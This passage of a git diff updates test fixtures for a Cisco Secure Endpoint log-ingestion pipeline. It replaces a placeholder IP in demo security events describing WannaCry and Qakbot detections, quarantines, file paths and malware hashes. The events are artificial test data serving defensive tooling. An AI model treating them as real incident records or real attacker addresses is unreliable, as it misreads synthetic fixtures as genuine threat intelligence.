Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204905956802580\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:51.461808700Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":286000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419204905956802580\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -4112,7 +4112,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -4153,7 +4153,7 @@ "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -4163,8 +4163,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103830803Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":800000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419204905956802579\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", + "ingested": "2021-12-09T13:35:51.461814700Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204905956803000,\"timestamp\":1610629578,\"timestamp_nanoseconds\":800000000,\"date\":\"2021-01-14T13:06:18+00:00\",\"event_type\":\"Threat 
Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419204905956802579\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "code": "553648143", "kind": "alert", "action": "Threat Quarantined", @@ -4184,7 +4184,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -4225,7 +4225,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -4235,8 +4235,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103832883Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":802000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204901661835277\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:51.461820300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":802000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204901661835277\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -4256,7 +4256,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -4301,7 +4301,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -4311,8 +4311,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103834989Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":646000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204897366867976\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:51.461824200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":646000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204897366867976\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -4332,7 +4332,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp7.log b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp7.log index 9842f3cbe93..1d8d7825cfd 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp7.log +++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp7.log 
@@ -1,49 +1,49 @@ -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867970","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":459000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204901661835279","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":443000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204901661835278","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":69000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Variant:Gen.20gl.1201","detection_id":"6419204901661835276","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":6000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204897366867979","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6419204897366867971","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462922463085000,"timestamp":1610629066,"timestamp_nanoseconds":103000000,"date":"2021-01-14T12:57:46+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6411462918168117251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462922463085000,"timestamp":1610629066,"timestamp_nanoseconds":103000000,"date":"2021-01-14T12:57:46+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6411462918168117252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411462918168117000,"timestamp":1610629065,"timestamp_nanoseconds":573000000,"date":"2021-01-14T12:57:45+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6411462918168117252","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"dd6d4fedd34a4d0e5c62b0e6d8c734d157ee921e07cddc82251755bed0de3f91","sha1":"75a94b8aa3b9a7c4de4f866b508111ac5a6f2b12","md5":"a97fb86da4e010974860e5024137b56b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":589000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.GenericKD:Gen.20fu.1201","detection_id":"6411456342573187074","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"11179468.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\11179468.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411456342573187000,"timestamp":1610627534,"timestamp_nanoseconds":558000000,"date":"2021-01-14T12:32:14+00:00","event_type":"Retrospective 
Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411456342573187073","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"AySxs.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\AySxs.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1492784107692000800,"timestamp":1610627262,"timestamp_nanoseconds":692000000,"date":"2021-01-14T12:27:42+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Critical","start_timestamp":1610627262,"start_date":"2021-01-14T12:27:42+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Qakbot is a worm that spreads through network shares and removable drives. 
It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.","short_description":"W32.Qakbot.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/Windows/SysWOW64/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"8063af71d08d015cc102788491c6274d3d33290b8dc41f91cc511a36fa0cba75"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1458626002840536600,"timestamp":1610627243,"timestamp_nanoseconds":268148295,"date":"2021-01-14T12:27:23+00:00","event_type":"Threat Detected in Low Prevalence 